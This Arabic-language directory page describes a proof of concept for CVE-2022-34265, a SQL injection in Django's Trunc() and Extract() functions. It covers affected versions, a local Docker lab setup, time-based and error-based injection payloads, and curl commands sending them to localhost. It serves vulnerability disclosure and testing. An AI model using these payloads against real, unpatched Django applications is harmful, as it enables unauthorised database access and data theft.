Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-34265 — PoC لـ CVE-2022-34265 | Kitploit
أدوات/GitHubGitHub/zhaoqi99/cve-2022-34265
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمن قواعد البيانات
GitHubzhaoqi99/cve-2022-34265

CVE-2022-34265

PoC لـ CVE-2022-34265

عرض المستودع
42منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-34265

PoC لـ CVE-2022-34265


الوصف

تم اكتشاف مشكلة في Django 3.2 قبل 3.2.14 و4.0 قبل 4.0.6. دوال قاعدة البيانات Trunc() وExtract() معرّضة لحقن SQL إذا تم استخدام بيانات غير موثوقة كقيمة kind/lookup_name. التطبيقات التي تقيّد اختيار lookup_name وkind إلى قائمة آمنة معروفة غير متأثرة.

كيفية الاستخدام

البدء

root@kitploit:~
git clone https://github.com/ZhaoQi99/CVE-2022-34265.git
cd CVE-2022-34265
docker-compose up -d

الإزالة

root@kitploit:~
docker-compose down

الإصدارات المتأثرة

  • Django>= 3.2, < 3.2.14

  • Django >= 4.0, < 4.0.6

الإصدارات المُصحَّحة

تنزيل الأداة
  • Django 3.2.14

  • Django 4.0.6

التحقق

البيئة

  • Django 4.0.5
  • Python 3.8.13
  • MySQL 5.7

الحمولة

  • YEAR FROM start_time)) ;select sleep(5)--

  • YEAR FROM start_time)) and updatexml(1,concat(1,(select name from TEST limit 1),1),1)--

Poc

root@kitploit:~
curl "http://127.0.0.1:8000/extract/?lookup_name=YEAR%20FROM%20start_time))%20%3Bselect%20sleep(5)--"
curl "http://127.0.0.1:8000/extract/?lookup_name=YEAR%20FROM%20start_time))%20and%20updatexml(1%2Cconcat(1%2C(select%20name%20from%20TEST%20limit%201)%2C1)%2C1)--"

ملاحظة: في حالة اختلاف قواعد البيانات، يختلف وجود الثغرات. الثغرة غير موجودة في دالة Trunc في الواجهة الخلفية لقاعدة بيانات MYSQL.

المراجع

  • المبلِّغ: TAKUTO YOSHIKAI (باستخدام PostgreSQL)

  • django/django@877c800

  • django/django@5e2f4dd

  • https://github.com/advisories/GHSA-p64x-8rxx-wf6q

  • CVE-2022-34265 Django SQL 注入漏洞调试分析 - 先知社区